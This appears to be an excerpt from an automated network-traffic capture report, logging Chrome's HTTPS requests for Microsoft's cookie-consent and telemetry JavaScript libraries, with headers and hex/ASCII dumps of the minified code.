                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                                        Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                                        2024-12-02 06:38:17 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                                                        Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        13192.168.2.84974313.107.246.634431524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:19 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-12-02 06:38:19 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:19 GMT
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                        Age: 41565
                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-request-id: ea98da45-d01e-00c3-3b23-44341b000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-azure-ref: 20241202T063819Z-174f7845968cdxdrhC1EWRg0en0000001440000000000d21
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:19 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16383INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                                        Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC3568INData Raw: 74 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61
                                                                                                                                                                                                        Data Ascii: t("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentCha


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.84974613.107.246.634431524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:19 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:20 GMT
                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        x-azure-ref: 20241202T063820Z-174f7845968cpnpfhC1EWR3afc00000013mg00000000b3mr
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache-Info: L2_T2
                                                                                                                                                                                                        X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                                        Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                                        Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                                        Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                                        Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                                        2024-12-02 06:38:20 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                                        Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
